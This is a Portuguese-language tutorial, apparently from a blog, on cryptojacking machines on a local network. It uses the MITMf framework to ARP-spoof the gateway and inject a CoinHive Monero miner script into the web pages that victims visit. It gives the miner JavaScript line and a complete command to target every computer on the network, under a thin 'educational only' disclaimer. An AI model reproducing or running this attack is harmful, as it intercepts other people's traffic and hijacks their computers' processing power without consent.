Injetando script de mineração de criptomoedas pela rede wifi ou cabeada
O tutorial a seguir tem o intuito apenas educacional, não nos responsabilizamos pelos seus atos ou o de nossa audiência.
Hoje demonstraremos para vocês um tutorial de como minerar criptomoedas (no caso a XMR - monero) utilizando o poder de processamento de máquinas que estejam em sua rede local, seja cabeada ou wireless (wifi).
*Caso deseja entender mais sobre criptomoedas como Bitcoin e outras, confira nossa série de artigos sobre Moedas do futuro clicando aqui.
O primeiro passo é ter instalado e configurado o framework MITMf, clique aqui para acessar a página do github deles, se preferir assista nosso tutorial abaixo de como baixar ele na distribuição Kali Linux.
Atualizado 12/07/2019: O site Coinhive encerrou suas atividades, portanto clique aqui e confira algumas alternativas.
Depois é necessário que tenha uma conta no CoinHive, clique aqui e saiba como cadastrar e ter acesso a sua KEY - lá tem mais informações sobre as opções de personalização do script que utilizaremos.
var miner = new CoinHive.Anonymous('SUA-KEY', { throttle: 0.7 });miner.start();
Substitua o trecho 'SUA-KEY' (mantenha as aspas simples) pela KEY que você encontra em sua conta no CoinHive. Salve o arquivo de texto no formato .js e agora bora acompanhar o tutorial em vídeo abaixo de como injetar um código javascript (sim, o tutorial serve para outros códigos javascripts também) nas páginas da internet visitadas pelo alvo.
Esquecemos de mencionar que não funciona com páginas HTTPS da forma como é apresentado no vídeo, para isso é necessário alguns passos a mais que não abordamos ainda - saiba sobre bypass https clicando aqui.
Para quem deseja injetar o script em todos os computadores da rede, basta digitar o comando da seguinte forma:
python mitm.py -i interface --spoof --arp --gateway roteador --inject --js-file arquivo.js --js-url https://coinhive.com/lib/coinhive.min.js
Ou seja, basta omitir o trecho --target ip-alvo .
COMENTÁRIOS